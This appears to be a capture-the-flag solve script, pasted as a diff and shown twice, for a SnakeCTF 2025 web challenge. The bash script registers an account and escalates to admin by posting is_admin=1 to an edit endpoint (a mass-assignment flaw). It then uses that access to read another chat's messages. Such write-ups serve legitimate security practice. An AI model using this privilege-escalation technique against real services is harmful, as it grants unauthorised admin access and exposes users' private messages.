HiitCat · August 30, 2025 16:15
diff --git a/SnakeCTF2025_Web_ExploitMe.sh b/SnakeCTF2025_Web_ExploitMe.sh
 #!/bin/bash

 URL="https://9f2c6b38bc4461a2b4545a00c94951e2.exploitme.challs.snakectf.org"
 USERNAME="hitcat"
 EMAIL="[email protected]"
 PASSWORD="Secret123!"

 # Step 1 : Register and get JWT
 echo "[*] Registering user $USERNAME..."
 TOKEN=$(curl -s -X POST "$URL/api/register" \
  -H "Content-Type: application/json" \
  -d "{\"username\":\"$USERNAME\",\"email\":\"$EMAIL\",\"password\":\"$PASSWORD\"}" \
  | jq -r .token)

 if [ "$TOKEN" = "null" ] || [ -z "$TOKEN" ]; then
  echo "[!] Failed to get token during register"
  exit 1
 fi
 echo "[+] Token obtained: $TOKEN"

 # Step 2 : Onboarding
 echo "[*] Sending onboarding data..."
 curl -s -X POST "$URL/api/onboarding" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "role": "WHITE_HAT",
    "looking_for": "WHITE_HAT",
    "age": 19,
    "likes": ["IoT"],
    "dislikes": ["SIM Swappers"],
    "bio": "Your leet bio here",
    "location": "Obviously, the Internet",
    "hacks": ["Morris Worm"],
    "favorite_hacker": "Kevin Mitnick",
    "favorite_song": "Careless Hacker",
    "favorite_movie": "My Little Pony: The Movie",
    "yt_embed": "https://www.youtube.com/embed/spY_RFBQu4E?si=hcQTihIIwkkG1mOc",
    "touches_grass": false
  }' | jq .

 # Step 3 : Admin priv esc via mass assignment
 echo "[*] Trying to escalate privileges (is_admin=1)..."
 curl -s -X POST "$URL/api/edit" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"is_admin":1}' | jq .

 # Step 4 : Report match n°4
 echo "[*] Reporting match 4..."
 curl -s -X POST "$URL/api/chat/4/report" \
  -H "Authorization: Bearer $TOKEN" | jq .

 # Step 5 : Reading match n°4 messages
 echo "[*] Reading messages from match 4..."
 curl -s "$URL/api/chat/4" \
  -H "Authorization: Bearer $TOKEN" \
  | jq -r '.messages[] | .content'
	#!/bin/bash

	URL="https://9f2c6b38bc4461a2b4545a00c94951e2.exploitme.challs.snakectf.org"
	USERNAME="hitcat"
	EMAIL="[email protected]"
	PASSWORD="Secret123!"

	# Step 1 : Register and get JWT
	echo "[*] Registering user $USERNAME..."
	TOKEN=$(curl -s -X POST "$URL/api/register" \
	-H "Content-Type: application/json" \
	-d "{\"username\":\"$USERNAME\",\"email\":\"$EMAIL\",\"password\":\"$PASSWORD\"}" \
	\| jq -r .token)

	if [ "$TOKEN" = "null" ] \|\| [ -z "$TOKEN" ]; then
	echo "[!] Failed to get token during register"
	exit 1
	fi
	echo "[+] Token obtained: $TOKEN"

	# Step 2 : Onboarding
	echo "[*] Sending onboarding data..."
	curl -s -X POST "$URL/api/onboarding" \
	-H "Authorization: Bearer $TOKEN" \
	-H "Content-Type: application/json" \
	-d '{
	"role": "WHITE_HAT",
	"looking_for": "WHITE_HAT",
	"age": 19,
	"likes": ["IoT"],
	"dislikes": ["SIM Swappers"],
	"bio": "Your leet bio here",
	"location": "Obviously, the Internet",
	"hacks": ["Morris Worm"],
	"favorite_hacker": "Kevin Mitnick",
	"favorite_song": "Careless Hacker",
	"favorite_movie": "My Little Pony: The Movie",
	"yt_embed": "https://www.youtube.com/embed/spY_RFBQu4E?si=hcQTihIIwkkG1mOc",
	"touches_grass": false
	}' \| jq .

	# Step 3 : Admin priv esc via mass assignment
	echo "[*] Trying to escalate privileges (is_admin=1)..."
	curl -s -X POST "$URL/api/edit" \
	-H "Authorization: Bearer $TOKEN" \
	-H "Content-Type: application/json" \
	-d '{"is_admin":1}' \| jq .

	# Step 4 : Report match n°4
	echo "[*] Reporting match 4..."
	curl -s -X POST "$URL/api/chat/4/report" \
	-H "Authorization: Bearer $TOKEN" \| jq .

	# Step 5 : Reading match n°4 messages
	echo "[*] Reading messages from match 4..."
	curl -s "$URL/api/chat/4" \
	-H "Authorization: Bearer $TOKEN" \
	\| jq -r '.messages[] \| .content'